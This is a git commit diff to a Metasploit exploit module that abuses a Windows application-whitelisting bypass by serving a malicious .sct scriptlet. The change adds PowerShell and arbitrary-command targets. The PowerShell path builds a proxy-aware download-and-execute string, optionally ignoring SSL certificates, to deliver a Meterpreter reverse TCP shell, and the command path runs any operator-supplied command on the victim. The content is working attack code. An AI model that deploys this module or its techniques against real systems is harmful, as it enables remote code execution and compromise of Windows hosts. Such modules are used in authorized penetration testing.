Added command option
parent
6af3c4ab99
commit
46eff4c96d
|
@ -32,7 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
'Payload' => 'windows/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Targets' => [['Windows', {}]],
|
||||
'Targets' => [
|
||||
['PSH', {}],
|
||||
['CMD', {}]
|
||||
],
|
||||
'Platform' => %w(win),
|
||||
'Arch' => [ARCH_X86, ARCH_X86_64],
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -42,6 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)',''])
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
|
@ -66,6 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def serve_sct_file
|
||||
print_status("Handling request for the .sct file from #{cli.peerhost}")
|
||||
url = get_uri
|
||||
case target.name
|
||||
when 'PSH'
|
||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||
download_and_run = "#{ignore_cert}#{download_string}"
|
||||
|
@ -75,6 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
command: download_and_run
|
||||
)
|
||||
data = gen_sct_file(psh_command)
|
||||
when 'CMD'
|
||||
data = gen_sct_file(datastore['CMD'])
|
||||
end
|
||||
send_response(cli, data, 'Content-Type' => 'text/plain')
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue